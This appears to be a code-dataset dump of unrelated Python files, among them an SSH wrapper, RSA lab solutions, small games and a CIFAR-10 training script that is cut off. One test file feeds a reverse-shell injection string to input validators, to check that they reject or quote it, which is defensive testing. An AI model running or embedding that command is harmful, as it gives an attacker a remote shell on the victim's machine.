np.hypot(dy__, dx__) - ave * blob.ncomp # compute g__ # pack all derts into dert__ dert__[:, :, 0] = p__ dert__[:, :, 1] = dy__ dert__[:, :, 2] = dx__ dert__[:, :, 3] = g__ blob.new_dert__[0] = dert__ # pack dert__ into blob return rng # ---------- inc_range() end ----------------------------------------------------------------------------------------
frame_2D_alg/comp_range.py
import numpy as np import numpy.ma as ma from math import hypot from filters import get_filters get_filters(globals()) # imports all filters at once def comp_range(blob): # compare rng-distant pixels within blob: a component of intra_blob rng = blob.rng + 1 p__ = ma.array(blob.dert__[:, :, 0], mask=~blob.map) # apply mask = ~map dy__ = ma.array(blob.dert__[:, :, 1], mask=~blob.map) dx__ = ma.array(blob.dert__[:, :, 2], mask=~blob.map) dert__ = ma.empty(shape=(height, width, 4), dtype=int) # initialize new dert__ comp_rng = rng * 2 # vertical comp: d__ = p__[comp_rng:, rng:-rng] - p__[:-comp_rng, rng:-rng] # bilateral comparison between p at coordinates (x, y + rng) and p at coordinates (x, y - rng) dy__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # horizontal comp: d__ = p__[rng:-rng, comp_rng:] - p__[rng:-rng, :-comp_rng] # bilateral comparison between p at coordinates (x + rng, y) and p at coordinates (x - rng, y) dx__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # diagonal comparison: for xd in range(1, rng): yd = rng - xd # half y and x distance between comparands bi_xd = xd * 2 bi_yd = comp_rng - bi_xd # y and x distance between comparands hyp = hypot(bi_yd, bi_xd) y_coef = bi_yd / hyp # to decompose d into dy x_coef = bi_xd / hyp # to decompose d into dx # top-left and bottom-right quadrants: d__ = p__[bi_yd:, bi_xd:] - p__[:-bi_yd, :-bi_xd] # comparison between p (x - xd, y - yd) and p (x + xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # buffer for dy accumulation temp_dx__ = d__ * x_coef # buffer for dx accumulation # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) # top-right and bottom-left quadrants: d__ = p__[bi_yd:, :-bi_xd] - p__[:-bi_yd, bi_xd:] # comparison between p (x + xd, y - yd) and p (x - xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # buffer for dy accumulation temp_dx__ = -(d__ * x_coef) # buffer for dx accumulation, sign inverted with comp direction # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) g__ = np.hypot(dy__, dx__) - ave * blob.ncomp # compute g__ # pack all derts into dert__ dert__[:, :, 0] = p__ dert__[:, :, 1] = dy__ dert__[:, :, 2] = dx__ dert__[:, :, 3] = g__ blob.new_dert__[0] = dert__ # pack dert__ into blob return rng # ---------- inc_range() end ----------------------------------------------------------------------------------------
0.464173
0.635873
from __future__ import absolute_import, division, unicode_literals, print_function, nested_scopes import getpass import logging from .cache import SSHConnectionCache, SSHNoConnectionCache MAXSSHBUF = 16 * 1024 g_no_cache = SSHNoConnectionCache() g_cmd_cache = SSHConnectionCache("SSH Command Cache") logger = logging.getLogger(__name__) def shell_escape_single_quote (command): """Escape single quotes for use in a shell single quoted string Explanation: (1) End first quotation which uses single quotes. (2) Start second quotation, using double-quotes. (3) Quoted character. (4) End second quotation, using double-quotes. (5) Start third quotation, using single quotes. If you do not place any whitespaces between (1) and (2), or between (4) and (5), the shell will interpret that string as a one long word """ return command.replace("'", "'\"'\"'") class SSHConnection (object): """A connection to an SSH server""" def __init__ (self, host, port=22, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_no_cache self.host = host self.port = port self.debug = debug self.cache = cache self.host_key = None self.chan = None self.ssh = None if not username: username = getpass.getuser() self.username = username self.ssh = cache.get_ssh_socket(host, port, username, password, debug, proxycmd) # Open a session. try: if self.debug: logger.debug("Opening SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan = self.ssh.open_session() except: self.close() raise def __del__ (self): # Make sure we get rid of the cached reference to the open ssh socket self.close() def close (self): if hasattr(self, "chan") and self.chan: if self.debug: logger.debug("Closing SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan.close() self.chan = None if hasattr(self, "ssh") and self.ssh: tmp = self.ssh self.ssh = None self.cache.release_ssh_socket(tmp, self.debug) def is_active (self): return self.chan and self.ssh and self.ssh.is_active() class SSHSession (SSHConnection): def send (self, chunk): assert self.chan is not None self.chan.send(chunk) def sendall (self, chunk): assert self.chan is not None self.chan.sendall(chunk) def recv (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv(size) def recv_ready (self): assert self.chan is not None return self.chan.recv_ready() def recv_stderr (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv_stderr(size) def recv_stderr_ready (self): assert self.chan is not None return self.chan.recv_stderr_ready() class SSHClientSession (SSHSession): """A client session to a host using a subsystem""" def __init__ (self, host, port, subsystem, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): super(SSHClientSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.invoke_subsystem(subsystem) except: self.close() raise class SSHCommandSession (SSHSession): """A client session to a host using a command i.e., like a remote pipe""" def __init__ (self, host, port, command, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_cmd_cache super(SSHCommandSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.exec_command(command) except: self.close() raise __author__ = '<NAME>' __version__ = '1.0' __docformat__ = "restructuredtext en"
sshutil/conn.py
from __future__ import absolute_import, division, unicode_literals, print_function, nested_scopes import getpass import logging from .cache import SSHConnectionCache, SSHNoConnectionCache MAXSSHBUF = 16 * 1024 g_no_cache = SSHNoConnectionCache() g_cmd_cache = SSHConnectionCache("SSH Command Cache") logger = logging.getLogger(__name__) def shell_escape_single_quote (command): """Escape single quotes for use in a shell single quoted string Explanation: (1) End first quotation which uses single quotes. (2) Start second quotation, using double-quotes. (3) Quoted character. (4) End second quotation, using double-quotes. (5) Start third quotation, using single quotes. If you do not place any whitespaces between (1) and (2), or between (4) and (5), the shell will interpret that string as a one long word """ return command.replace("'", "'\"'\"'") class SSHConnection (object): """A connection to an SSH server""" def __init__ (self, host, port=22, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_no_cache self.host = host self.port = port self.debug = debug self.cache = cache self.host_key = None self.chan = None self.ssh = None if not username: username = getpass.getuser() self.username = username self.ssh = cache.get_ssh_socket(host, port, username, password, debug, proxycmd) # Open a session. try: if self.debug: logger.debug("Opening SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan = self.ssh.open_session() except: self.close() raise def __del__ (self): # Make sure we get rid of the cached reference to the open ssh socket self.close() def close (self): if hasattr(self, "chan") and self.chan: if self.debug: logger.debug("Closing SSH channel on socket (%s:%s)", self.host, str(self.port)) self.chan.close() self.chan = None if hasattr(self, "ssh") and self.ssh: tmp = self.ssh self.ssh = None self.cache.release_ssh_socket(tmp, self.debug) def is_active (self): return self.chan and self.ssh and self.ssh.is_active() class SSHSession (SSHConnection): def send (self, chunk): assert self.chan is not None self.chan.send(chunk) def sendall (self, chunk): assert self.chan is not None self.chan.sendall(chunk) def recv (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv(size) def recv_ready (self): assert self.chan is not None return self.chan.recv_ready() def recv_stderr (self, size=MAXSSHBUF): assert self.chan is not None return self.chan.recv_stderr(size) def recv_stderr_ready (self): assert self.chan is not None return self.chan.recv_stderr_ready() class SSHClientSession (SSHSession): """A client session to a host using a subsystem""" def __init__ (self, host, port, subsystem, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): super(SSHClientSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.invoke_subsystem(subsystem) except: self.close() raise class SSHCommandSession (SSHSession): """A client session to a host using a command i.e., like a remote pipe""" def __init__ (self, host, port, command, username=None, password=<PASSWORD>, debug=False, cache=None, proxycmd=None): if cache is None: cache = g_cmd_cache super(SSHCommandSession, self).__init__(host, port, username, password, debug, cache, proxycmd) try: self.chan.exec_command(command) except: self.close() raise __author__ = '<NAME>' __version__ = '1.0' __docformat__ = "restructuredtext en"
0.626238
0.140013
import string import random import math import numpy as np from itertools import izip_longest from collections import namedtuple from fractions import gcd PublicKey = namedtuple("PublicKey", ['e', 'n']) PrivateKey = namedtuple("PrivateKey", ['d', 'n', 'phi_n']) def genkeys(bits, e): p = nextprime(random.getrandbits(bits//2)) q = nextprime(random.getrandbits(bits//2)) n = p * q pn = (p-1)*(q-1) e %= pn while gcd(e, pn) != 1 or e < 2: e = (e + 1) % pn d = modinv(e, pn) return PublicKey(e, n), PrivateKey(d, n, pn) def mod_nai(b, e, m): c = b loops = 0 largest = 0 for x in xrange(1, e): c = c * b largest = largest if c < largest else c c %= m loops += 1 return c, loops, largest def mod_sch(b, e, m): result = 1 b %= m loops = 0 while e > 0: if e % 2 == 1: result = (result * b) % m e >>= 1 b = (b * b) % m loops += 1 return result, loops def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def modinv(a, m): gcd, x, y = egcd(a, m) if gcd != 1: return None # modular inverse does not exist else: return x % m def fermat(n): prime = set() for a in xrange(2, n): if pow(a, n-1, n) == 1: prime.add(a) return prime def witnessmap(n): r = (n-2)**.5 wm = np.zeros((r+1,r+1)) f = fermat(n) for i, _ in np.ndenumerate(wm.flat): if i[0]+2 < n: wm.flat[i] = 228 if i[0]+2 in f else 128 return wm def isprime(n, confidence=.99): err = 1 - confidence t = 0 while 1./pow(2, t) > err: a = random.randrange(2, n) if pow(a, n-1, n) != 1: return False t += 1 return True def nextprime(n, confidence=.99): while not isprime(n + 1): n += 1 return n + 1 def makeint(msg): newmsg = [] for c in msg: newmsg.append(str2int[c]) return ''.join(newmsg) def makestr(msg): newmsg = [] for c in msg[::2]: newmsg.append(int2str[c]) return ''.join(newmsg) def s2i(msg): #convert message to binary if not isinstance(msg, bytearray): msg = bytearray(msg) binmsg = [] for c in msg: binmsg.append(bin(c)[2:].zfill(8)) return int(''.join(binmsg), 2) def grouper(iterable, n, fillvalue=None): "Collect data into fixed-length chunks or blocks" # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx args = [iter(iterable)] * n return izip_longest(fillvalue=fillvalue, *args) def i2s(msg): binmsg = bin(msg)[2:] binmsg = "0"*(8-(len(binmsg)%8)) + binmsg msg = bytearray() for block in grouper(binmsg, 8): msg.append(int(''.join(block), 2)) return msg def encrypt(key, message): m = s2i(message) if m.bit_length() > key.n.bit_length(): raise ValueError("Key must be at least {} bits to encrypt this message.".format(m.bit_length())) c = pow(m, key.e, key.n) return i2s(c) def decrypt(key, message): c = s2i(message) m = pow(c, key.d, key.n) return i2s(m)
Labs/RSA/solutions.py
import string import random import math import numpy as np from itertools import izip_longest from collections import namedtuple from fractions import gcd PublicKey = namedtuple("PublicKey", ['e', 'n']) PrivateKey = namedtuple("PrivateKey", ['d', 'n', 'phi_n']) def genkeys(bits, e): p = nextprime(random.getrandbits(bits//2)) q = nextprime(random.getrandbits(bits//2)) n = p * q pn = (p-1)*(q-1) e %= pn while gcd(e, pn) != 1 or e < 2: e = (e + 1) % pn d = modinv(e, pn) return PublicKey(e, n), PrivateKey(d, n, pn) def mod_nai(b, e, m): c = b loops = 0 largest = 0 for x in xrange(1, e): c = c * b largest = largest if c < largest else c c %= m loops += 1 return c, loops, largest def mod_sch(b, e, m): result = 1 b %= m loops = 0 while e > 0: if e % 2 == 1: result = (result * b) % m e >>= 1 b = (b * b) % m loops += 1 return result, loops def egcd(a, b): x,y, u,v = 0,1, 1,0 while a != 0: q, r = b//a, b%a m, n = x-u*q, y-v*q b,a, x,y, u,v = a,r, u,v, m,n gcd = b return gcd, x, y def modinv(a, m): gcd, x, y = egcd(a, m) if gcd != 1: return None # modular inverse does not exist else: return x % m def fermat(n): prime = set() for a in xrange(2, n): if pow(a, n-1, n) == 1: prime.add(a) return prime def witnessmap(n): r = (n-2)**.5 wm = np.zeros((r+1,r+1)) f = fermat(n) for i, _ in np.ndenumerate(wm.flat): if i[0]+2 < n: wm.flat[i] = 228 if i[0]+2 in f else 128 return wm def isprime(n, confidence=.99): err = 1 - confidence t = 0 while 1./pow(2, t) > err: a = random.randrange(2, n) if pow(a, n-1, n) != 1: return False t += 1 return True def nextprime(n, confidence=.99): while not isprime(n + 1): n += 1 return n + 1 def makeint(msg): newmsg = [] for c in msg: newmsg.append(str2int[c]) return ''.join(newmsg) def makestr(msg): newmsg = [] for c in msg[::2]: newmsg.append(int2str[c]) return ''.join(newmsg) def s2i(msg): #convert message to binary if not isinstance(msg, bytearray): msg = bytearray(msg) binmsg = [] for c in msg: binmsg.append(bin(c)[2:].zfill(8)) return int(''.join(binmsg), 2) def grouper(iterable, n, fillvalue=None): "Collect data into fixed-length chunks or blocks" # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx args = [iter(iterable)] * n return izip_longest(fillvalue=fillvalue, *args) def i2s(msg): binmsg = bin(msg)[2:] binmsg = "0"*(8-(len(binmsg)%8)) + binmsg msg = bytearray() for block in grouper(binmsg, 8): msg.append(int(''.join(block), 2)) return msg def encrypt(key, message): m = s2i(message) if m.bit_length() > key.n.bit_length(): raise ValueError("Key must be at least {} bits to encrypt this message.".format(m.bit_length())) c = pow(m, key.e, key.n) return i2s(c) def decrypt(key, message): c = s2i(message) m = pow(c, key.d, key.n) return i2s(m)
0.325199
0.297732
from validator import ip_address, user_name, password, boolean, platform, MAX_PASSWD_LEN from shlex import quote import pytest @pytest.mark.parametrize('value', ['0.0.0.0', '255.255.255.255', '1.1.1.1']) def test_ip_address_must_not_raise_if_valid_value_provided(value): assert ip_address(value) == value @pytest.mark.parametrize('value', ['\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', '0.0.0', '1.1.1.1/24', '11a.22.22.22', '127.0.0.1']) def test_ip_address_must_raise_value_error_if_invalid_value_provided(value): with pytest.raises(ValueError): ip_address(value) def test_user_name_must_accept_only_root(): assert user_name('root') == 'root' @pytest.mark.parametrize('value', ['root1', 'asdf', 'name']) def test_user_name_must_allow_only_root(value): with pytest.raises(ValueError): user_name(value) def test_password_must_be_under_32_characters_len_instead_must_raise(): with pytest.raises(ValueError): password('*' * (MAX_PASSWD_LEN + 1)) @pytest.mark.parametrize('value, expected', [('*' * MAX_PASSWD_LEN, quote('*' * MAX_PASSWD_LEN)), ('\'p\'a\'s\'s\'w\'o\'r\'d\'', quote('\'p\'a\'s\'s\'w\'o\'r\'d\'')), ('Passw0rd', '<PASSWORD>'), ('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', quote('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #'))]) def test_password_must_eliminate_single_quote_in_other_cases_must_leave_value_unchanged(value, expected): assert password(value) == expected @pytest.mark.parametrize('value, expected', [('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', True), ('0', True), ('1', True), ('', False)]) def test_boolean_all_none_empty_strings_are_true_and_empty_is_false(value, expected): assert boolean(value) == expected @pytest.mark.parametrize('value', ['linux', 'none']) def test_platform_must_allow_only_linux_and_none(value): assert platform(value) == value def test_platform_must_raise_if_non_acceptable_value(): with pytest.raises(ValueError): platform('asdf')
app/validator_test.py
from validator import ip_address, user_name, password, boolean, platform, MAX_PASSWD_LEN from shlex import quote import pytest @pytest.mark.parametrize('value', ['0.0.0.0', '255.255.255.255', '1.1.1.1']) def test_ip_address_must_not_raise_if_valid_value_provided(value): assert ip_address(value) == value @pytest.mark.parametrize('value', ['\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', '0.0.0', '1.1.1.1/24', '11a.22.22.22', '127.0.0.1']) def test_ip_address_must_raise_value_error_if_invalid_value_provided(value): with pytest.raises(ValueError): ip_address(value) def test_user_name_must_accept_only_root(): assert user_name('root') == 'root' @pytest.mark.parametrize('value', ['root1', 'asdf', 'name']) def test_user_name_must_allow_only_root(value): with pytest.raises(ValueError): user_name(value) def test_password_must_be_under_32_characters_len_instead_must_raise(): with pytest.raises(ValueError): password('*' * (MAX_PASSWD_LEN + 1)) @pytest.mark.parametrize('value, expected', [('*' * MAX_PASSWD_LEN, quote('*' * MAX_PASSWD_LEN)), ('\'p\'a\'s\'s\'w\'o\'r\'d\'', quote('\'p\'a\'s\'s\'w\'o\'r\'d\'')), ('Passw0rd', '<PASSWORD>'), ('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', quote('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #'))]) def test_password_must_eliminate_single_quote_in_other_cases_must_leave_value_unchanged(value, expected): assert password(value) == expected @pytest.mark.parametrize('value, expected', [('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', True), ('0', True), ('1', True), ('', False)]) def test_boolean_all_none_empty_strings_are_true_and_empty_is_false(value, expected): assert boolean(value) == expected @pytest.mark.parametrize('value', ['linux', 'none']) def test_platform_must_allow_only_linux_and_none(value): assert platform(value) == value def test_platform_must_raise_if_non_acceptable_value(): with pytest.raises(ValueError): platform('asdf')
0.511961
0.334426
from __future__ import print_function, division, absolute_import import os import sys import pkgutil import traceback import importlib from collections import OrderedDict from tpDcc.libs.python import python def import_module(module_name): """ Static function used to import a function given its complete name :param module_name: str, name of the module we want to import """ try: mod = importlib.import_module(module_name) # print('Imported: {} | {}'.format(module_name, mod)) return mod except Exception: try: print('FAILED IMPORT: {} -> {}'.format(str(module_name), str(traceback.format_exc()))) except Exception: print('FAILED IMPORT: {}'.format(module_name)) def reload_module(module_to_reload): """ Reloads given module :param module_to_reload: mode """ if sys.version[0] <= '2': reload(module_to_reload) else: importlib.reload(module_to_reload) def import_submodules(package_dot_path, skip_modules, recursive=True): """ Import all the modules of the package """ extra_skip = tuple(['{}.'.format(mod) for mod in skip_modules]) def _import_submodules(pkg): found_modules = list() if python.is_string(pkg): pkg = import_module(pkg) if not pkg: return found_modules pkg_paths = tuple([os.path.normpath(pkg_path) for pkg_path in pkg.__path__ if pkg is not None]) for pkg_path in list(pkg_paths): for loader, name, is_pkg in pkgutil.walk_packages(pkg_paths): loader_path = os.path.normpath(loader.path) full_name = pkg.__name__ + '.' + name if not loader_path.startswith(pkg_path): # print('Trying to import non valid module: {} | {}'.format(full_name, loader_path)) continue if full_name in skip_modules or full_name.startswith(extra_skip): # print('Skipping .... {}'.format(full_name)) continue found_modules.append(full_name) if recursive and is_pkg: found_modules.extend(_import_submodules(full_name)) return found_modules modules_to_import = [package_dot_path] modules_to_import.extend(list(set(_import_submodules(package_dot_path)))) loaded_modules = OrderedDict() for full_name in modules_to_import: loaded_modules[full_name] = import_module(full_name) return loaded_modules class PackageImporter(object): """ Base class that allows to import/reload all the modules in a given package and in a given order """ def __init__(self, package): super(PackageImporter, self).__init__() self._package = package self.loaded_modules = OrderedDict() self.reload_modules = list() def import_package(self, skip_modules=None): skip_modules = skip_modules if skip_modules else list() skip_modules = tuple(mod for mod in skip_modules) return import_submodules(self._package, skip_modules=skip_modules) def init_importer(package, skip_modules=None): """ Initializes importer :param package: :param skip_modules: bool :return: """ new_importer = PackageImporter(package) new_importer.import_package(skip_modules=skip_modules) return new_importer
tpDcc/libs/python/importer.py
from __future__ import print_function, division, absolute_import import os import sys import pkgutil import traceback import importlib from collections import OrderedDict from tpDcc.libs.python import python def import_module(module_name): """ Static function used to import a function given its complete name :param module_name: str, name of the module we want to import """ try: mod = importlib.import_module(module_name) # print('Imported: {} | {}'.format(module_name, mod)) return mod except Exception: try: print('FAILED IMPORT: {} -> {}'.format(str(module_name), str(traceback.format_exc()))) except Exception: print('FAILED IMPORT: {}'.format(module_name)) def reload_module(module_to_reload): """ Reloads given module :param module_to_reload: mode """ if sys.version[0] <= '2': reload(module_to_reload) else: importlib.reload(module_to_reload) def import_submodules(package_dot_path, skip_modules, recursive=True): """ Import all the modules of the package """ extra_skip = tuple(['{}.'.format(mod) for mod in skip_modules]) def _import_submodules(pkg): found_modules = list() if python.is_string(pkg): pkg = import_module(pkg) if not pkg: return found_modules pkg_paths = tuple([os.path.normpath(pkg_path) for pkg_path in pkg.__path__ if pkg is not None]) for pkg_path in list(pkg_paths): for loader, name, is_pkg in pkgutil.walk_packages(pkg_paths): loader_path = os.path.normpath(loader.path) full_name = pkg.__name__ + '.' + name if not loader_path.startswith(pkg_path): # print('Trying to import non valid module: {} | {}'.format(full_name, loader_path)) continue if full_name in skip_modules or full_name.startswith(extra_skip): # print('Skipping .... {}'.format(full_name)) continue found_modules.append(full_name) if recursive and is_pkg: found_modules.extend(_import_submodules(full_name)) return found_modules modules_to_import = [package_dot_path] modules_to_import.extend(list(set(_import_submodules(package_dot_path)))) loaded_modules = OrderedDict() for full_name in modules_to_import: loaded_modules[full_name] = import_module(full_name) return loaded_modules class PackageImporter(object): """ Base class that allows to import/reload all the modules in a given package and in a given order """ def __init__(self, package): super(PackageImporter, self).__init__() self._package = package self.loaded_modules = OrderedDict() self.reload_modules = list() def import_package(self, skip_modules=None): skip_modules = skip_modules if skip_modules else list() skip_modules = tuple(mod for mod in skip_modules) return import_submodules(self._package, skip_modules=skip_modules) def init_importer(package, skip_modules=None): """ Initializes importer :param package: :param skip_modules: bool :return: """ new_importer = PackageImporter(package) new_importer.import_package(skip_modules=skip_modules) return new_importer
0.32306
0.07971
import random import arcade from constants import * from randomly_place_sprite import randomly_place_sprite from wander_sprite import WanderSprite def _create_grid_with_cells(width, height): """ Create a grid with empty cells on odd row/column combinations. """ grid = [] for row in range(height): grid.append([]) for column in range(width): if column % 2 == 1 and row % 2 == 1: grid[row].append(0) elif column == 0 or row == 0 or column == width - 1 or row == height - 1: grid[row].append(1) else: grid[row].append(1) return grid def get_level_2_array(): maze = _create_grid_with_cells(GRID_WIDTH, GRID_HEIGHT) w = (len(maze[0]) - 1) // 2 h = (len(maze) - 1) // 2 vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)] def walk(x, y): vis[y][x] = 1 d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)] random.shuffle(d) for (xx, yy) in d: if vis[yy][xx]: continue if xx == x: maze[max(y, yy) * 2][x * 2 + 1] = 0 if yy == y: maze[y * 2 + 1][max(x, xx) * 2] = 0 walk(xx, yy) walk(random.randrange(w), random.randrange(h)) # Randomly open some extra passages count = 0 while count < 10: x = random.randrange(5, GRID_WIDTH - 5) y = random.randrange(5, GRID_HEIGHT - 5) if maze[y][x] != 0 and maze[y-1][x] != 0 and maze[y+1][x]: maze[y][x] = 0 count += 1 elif maze[y][x] != 0 and maze[y][x-1] != 0 and maze[y][x+1]: maze[y][x] = 0 count += 1 return maze def add_level_2_creatures(level): level.creature_list = arcade.SpriteList() key = arcade.Sprite("images/key-02.png", OBJECT_SPRITE_SCALING) key.tag = "key-02" randomly_place_sprite(key, level.wall_list) level.objects_list.append(key) for i in range(3): skull = WanderSprite("images/skull.png", CREATURE_SPRITE_SCALING) skull.tag = "skull" skull.dialog_list = ["Woooo!"] skull.physics_engine = arcade.PhysicsEngineSimple(skull, level.all_obstacles) randomly_place_sprite(skull, level.wall_list) level.creature_list.append(skull)
source/level_2.py
import random import arcade from constants import * from randomly_place_sprite import randomly_place_sprite from wander_sprite import WanderSprite def _create_grid_with_cells(width, height): """ Create a grid with empty cells on odd row/column combinations. """ grid = [] for row in range(height): grid.append([]) for column in range(width): if column % 2 == 1 and row % 2 == 1: grid[row].append(0) elif column == 0 or row == 0 or column == width - 1 or row == height - 1: grid[row].append(1) else: grid[row].append(1) return grid def get_level_2_array(): maze = _create_grid_with_cells(GRID_WIDTH, GRID_HEIGHT) w = (len(maze[0]) - 1) // 2 h = (len(maze) - 1) // 2 vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)] def walk(x, y): vis[y][x] = 1 d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)] random.shuffle(d) for (xx, yy) in d: if vis[yy][xx]: continue if xx == x: maze[max(y, yy) * 2][x * 2 + 1] = 0 if yy == y: maze[y * 2 + 1][max(x, xx) * 2] = 0 walk(xx, yy) walk(random.randrange(w), random.randrange(h)) # Randomly open some extra passages count = 0 while count < 10: x = random.randrange(5, GRID_WIDTH - 5) y = random.randrange(5, GRID_HEIGHT - 5) if maze[y][x] != 0 and maze[y-1][x] != 0 and maze[y+1][x]: maze[y][x] = 0 count += 1 elif maze[y][x] != 0 and maze[y][x-1] != 0 and maze[y][x+1]: maze[y][x] = 0 count += 1 return maze def add_level_2_creatures(level): level.creature_list = arcade.SpriteList() key = arcade.Sprite("images/key-02.png", OBJECT_SPRITE_SCALING) key.tag = "key-02" randomly_place_sprite(key, level.wall_list) level.objects_list.append(key) for i in range(3): skull = WanderSprite("images/skull.png", CREATURE_SPRITE_SCALING) skull.tag = "skull" skull.dialog_list = ["Woooo!"] skull.physics_engine = arcade.PhysicsEngineSimple(skull, level.all_obstacles) randomly_place_sprite(skull, level.wall_list) level.creature_list.append(skull)
0.415373
0.48377
from Sanitize import * def TicTacToe(): board = [" ", " ", " ", " ", " ", " ", " ", " ", " "] def print_board(): print("", board[0], "|", board[1], "|", board[2]) print("---+---+---") print("", board[3], "|", board[4], "|", board[5]) print("---+---+---") print("", board[6], "|", board[7], "|", board[8]) def victory_check(piece, player): if board[0] == board[1] == board[2] == piece or \ board[3] == board[4] == board[5] == piece or \ board[6] == board[7] == board[8] == piece or \ board[0] == board[3] == board[6] == piece or \ board[1] == board[4] == board[7] == piece or \ board[2] == board[5] == board[8] == piece or \ board[0] == board[4] == board[8] == piece or \ board[2] == board[4] == board[6] == piece: print_board() print(f"Player {player} Wins!") return True def piece_placement(piece): while True: piece_target = validator("+") print_board() if piece_target > 9 or piece_target < 1: print("There's no such position!") pass elif board[piece_target - 1] != " ": print("That space is already filled! Please choose another position") pass else: break board[piece_target - 1] = piece for turn in range(1, 11): if " " not in board: print("You're all out of positions to place more pieces." "It's a draw!") break player_list = [2, 1] piece_list = ["O", "X"] print_board() print(f"where will you be placing your piece, player {player_list[turn % 2]}?") piece_placement(piece_list[turn % 2 != 0]) if victory_check(piece_list[turn % 2 != 0], player_list[turn % 2]): break def restart_check(): print("Would you like to play another game? (Y,N)") restart = input().lower() while restart != "y" and restart != "n": print("The valid inputs are either Y or N.") restart = input() while restart == "y": TicTacToe() print("Would you like to play another game? (Y,N)") restart = input() if restart == "n": print("\n\n\nGame Over!") TicTacToe() restart_check()
TicTacToeOpt.py
from Sanitize import * def TicTacToe(): board = [" ", " ", " ", " ", " ", " ", " ", " ", " "] def print_board(): print("", board[0], "|", board[1], "|", board[2]) print("---+---+---") print("", board[3], "|", board[4], "|", board[5]) print("---+---+---") print("", board[6], "|", board[7], "|", board[8]) def victory_check(piece, player): if board[0] == board[1] == board[2] == piece or \ board[3] == board[4] == board[5] == piece or \ board[6] == board[7] == board[8] == piece or \ board[0] == board[3] == board[6] == piece or \ board[1] == board[4] == board[7] == piece or \ board[2] == board[5] == board[8] == piece or \ board[0] == board[4] == board[8] == piece or \ board[2] == board[4] == board[6] == piece: print_board() print(f"Player {player} Wins!") return True def piece_placement(piece): while True: piece_target = validator("+") print_board() if piece_target > 9 or piece_target < 1: print("There's no such position!") pass elif board[piece_target - 1] != " ": print("That space is already filled! Please choose another position") pass else: break board[piece_target - 1] = piece for turn in range(1, 11): if " " not in board: print("You're all out of positions to place more pieces." "It's a draw!") break player_list = [2, 1] piece_list = ["O", "X"] print_board() print(f"where will you be placing your piece, player {player_list[turn % 2]}?") piece_placement(piece_list[turn % 2 != 0]) if victory_check(piece_list[turn % 2 != 0], player_list[turn % 2]): break def restart_check(): print("Would you like to play another game? (Y,N)") restart = input().lower() while restart != "y" and restart != "n": print("The valid inputs are either Y or N.") restart = input() while restart == "y": TicTacToe() print("Would you like to play another game? (Y,N)") restart = input() if restart == "n": print("\n\n\nGame Over!") TicTacToe() restart_check()
0.298696
0.645511
from os import X_OK import torch import torchvision from net.cvt_offical import get_cvt13_pretrained from utils import train_transform, test_transform,initialize,smooth_crossentropy from config import device from ptflops import get_model_complexity_info import torch.nn.functional as F import torch.nn as nn initialize(42) device = torch.device('cuda:0') model = torchvision.models.resnet50(pretrained=True) flops, params = get_model_complexity_info(model,(3,224,224),print_per_layer_stat=False) print('flops',flops, 'params',params) model.fc = nn.Linear(512*4,10) model.to(device) # flops 4.06 GMac params 19.6 M 均比resnet50小 BATCH = 32 trainset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=True, download=True, transform=train_transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH, shuffle=True) testset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=False, download=True, transform=test_transform) testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH, shuffle=False) LR = 1e-3 DECAY = 0 EPOCH = 20 optimizer = torch.optim.SGD(model.parameters(),lr=LR,momentum=0.9,weight_decay=DECAY) def train(dataloader,train_sam=False): model.train() tot_loss = 0 tot_num = 0 for i,data in enumerate(dataloader): x,y = data x = x.to(device) y = y.to(device) x = F.interpolate(x, size=(224,224), mode='bilinear', align_corners=True) logits = model(x) #非SAM if train_sam is False: optimizer.zero_grad() loss = smooth_crossentropy(logits,y).mean() loss.backward() optimizer.step() #可以考虑使用SAM进行训练 else: loss = smooth_crossentropy(logits,y).mean() loss.backward() 